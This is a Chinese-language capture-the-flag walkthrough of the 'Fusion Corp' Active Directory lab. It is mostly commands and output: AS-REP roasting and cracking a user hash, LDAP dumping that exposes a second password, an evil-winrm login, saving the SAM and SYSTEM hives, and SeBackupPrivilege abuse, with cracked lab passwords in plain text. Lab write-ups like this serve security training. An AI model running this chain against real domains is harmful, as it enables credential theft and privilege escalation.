Fusion Corp
困难程度: ⭐⭐ 考察知识点: Kerberos 服务利用, LDAP, 用户特权
端口扫描
root@ip-10-10-145-140:~# nmap -sTCV -p- --min-rate 1000 10.10.242.249
Starting Nmap 7.60 ( https://nmap.org ) at 2023-11-18 04:51 GMT
Nmap scan report for ip-10-10-242-249.eu-west-1.compute.internal (10.10.242.249)
Host is up (0.0079s latency).
Not shown: 65513 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: eBusiness Bootstrap Template
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-11-18 04:53:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain:0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Fusion-DC.fusion.corp
| Not valid before: 2023-11-17T04:08:41
|_Not valid after: 2024-05-18T04:08:41
|_ssl-date: 2023-11-18T04:54:00+00:00; 0s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49816/tcp open msrpc Microsoft Windows RPC
MAC Address: 02:D4:32:3C:00:5D (Unknown)
Service Info: Host: FUSION-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: FUSION-DC, NetBIOS user: <unknown>, NetBIOS MAC: 02:d4:32:3c:00:5d (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-11-18 04:54:01
|_ start_date: 1600-12-31 23:58:45
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 196.45 seconds
80
root@ip-10-10-238-207:~/fusioncorp# gobuster dir -u http://10.10.43.101/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.43.101/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,html
[+] Timeout: 10s
===============================================================
2023/11/18 14:27:52 Starting gobuster
===============================================================
/index.html (Status: 200)
/img (Status: 301)
/blog.html (Status: 200)
/css (Status: 301)
/Index.html (Status: 200)
/lib (Status: 301)
/js (Status: 301)
/Blog.html (Status: 200)
/backup (Status: 301)
/contactform (Status: 301)
===============================================================
2023/11/18 14:41:45 Finished
===============================================================
访问 /backup 目录, 从这里获取到用户列表, 因此可以进行 kerberos 攻击
Name Username
Jhon Mickel jmickel
Andrew Arnold aarnold
Lellien Linda llinda
Jhon Powel jpowel
Dominique Vroslav dvroslav
Thomas Jeffersonn tjefferson
Nola Maurin nmaurin
Mira Ladovic mladovic
Larry Parker lparker
Kay Garland kgarland
Diana Pertersen dpertersen
kerberos
root@ip-10-10-238-207:~/fusioncorp# GetNPUsers.py fusion.corp/ -dc-ip 10.10.43.101 -usersfile name.txt
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] invalid principal syntax
$krb5asrep$23$lparker@FUSION.CORP:d7ebc28f55a2aeb21c71720fd6453f09$86fbbd54ddfb955bfa7a6580ec68386178bffc8bdf6a28c7edc1b8aaa9db8ef5733f025e42ccb6d02169ed20b1af0a7251397849433e08add50134bf7067e7e0bfa1abf1f33056f398e952521e31d6d897d7c2c14d670034d39e1b47f5bb237bba894f421cd914f3cea0b0d3c42a4557a07576dd06cf1305dc5139decccc3b6fa2f4ef5fde899b5be3275c3c3b04bf917fabfb0689c6dc2b0bd0bfadc336540e7e6baa3f1323c2a61e4527c8386e57cf5aa4dd243c3c498c4127296cd63845ce18af8fcadd49cae61e733b9f29a82c7c1ea3d3d74cadd03d0ac524f92d32370294a282a86651f4892d5b
[-] invalid principal syntax
root@ip-10-10-238-207:~/fusioncorp# john hash.txt --wordlist=`locate rockyou.txt`
Warning: detected hash type "krb5asrep", but the string is also recognized as "krb5asrep-aes-opencl"
Use the "--format=krb5asrep-aes-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!!abbylvzsvs2k6! ($krb5asrep$23$lparker@FUSION.CORP)
1g 0:00:00:06 DONE (2023-11-18 14:45) 0.1524g/s 375024p/s 375024c/s 375024C/s !@#$%%^PRDAluv..\u0e45\u0e45/\u0e04\u0e45\u0e45/\u0e04
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
SMB
root@ip-10-10-238-207:~/fusioncorp# smbmap.py -H 10.10.126.129 -u lparker -p '!!abbylvzsvs2k6!'
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - [email protected]
https://github.com/ShawnDEvans/smbmap
[+] IP: 10.10.126.129:445 Name: fusion.corp Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
本来想在这里 dump 哈希的但是失败了
ldap
我们可以使用一些工具来对 ldap 服务进行一些枚举来获取一些内容
root@ip-10-10-238-207:~/fusioncorp/ldap# ldapdomaindump 10.10.126.129 -u 'fusion.corp\lparker' -p '!!abbylvzsvs2k6!'
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
root@ip-10-10-238-207:~/fusioncorp/ldap# ls
domain_computers_by_os.html domain_computers.json domain_groups.json domain_policy.json domain_trusts.json domain_users.html
domain_computers.grep domain_groups.grep domain_policy.grep domain_trusts.grep domain_users_by_group.html domain_users.json
domain_computers.html domain_groups.html domain_policy.html domain_trusts.html domain_users.grep
root@ip-10-10-238-207:~/fusioncorp/ldap#
在其中 domain_users.html 文件中, 我再次获取到一个用户的密码信息
后渗透
lparker
lparker —>jmurphy
发现用户 jmurphy 存在 SeBackupPrivilege , 直接备份 SAM 文件
root@ip-10-10-238-207:~/fusioncorp# evil-winrm -i 10.10.126.129 -u jmurphy -p 'u8WC3!kLsgw=#bRY'
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jmurphy\Documents> whoami
fusion\jmurphy
*Evil-WinRM* PS C:\Users\jmurphy\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> reg save hklm\sam .\sam
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> reg save hklm\system .\system
jmurphy —> administrator
将对应得文件保存下来, 进行分析获取到 administrator 用户得哈希 但是很可惜这里管理员用户并不能进行远程登陆, 所以使用了另一种方式进行利用 https://github.com/giuliano108/SeBackupPrivilege
*Evil-WinRM* PS C:\Users\jmurphy\Documents> Import-Module C:\Users\jmurphy\Documents\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\jmurphy\Documents> Import-Module C:\Users\jmurphy\Documents\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\jmurphy\Documents> Copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\flag.txt C:\Users\jmurphy\Documents\flag.txt
*Evil-WinRM* PS C:\Users\jmurphy\Documents> ls
Directory: C:\Users\jmurphy\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/18/2023 8:19 AM 37 flag.txt
-a---- 11/18/2023 8:18 AM 12288 SeBackupPrivilegeCmdLets.dll
-a---- 11/18/2023 8:18 AM 16384 SeBackupPrivilegeUtils.dll
-a---- 11/18/2023 7:57 AM 18075648 system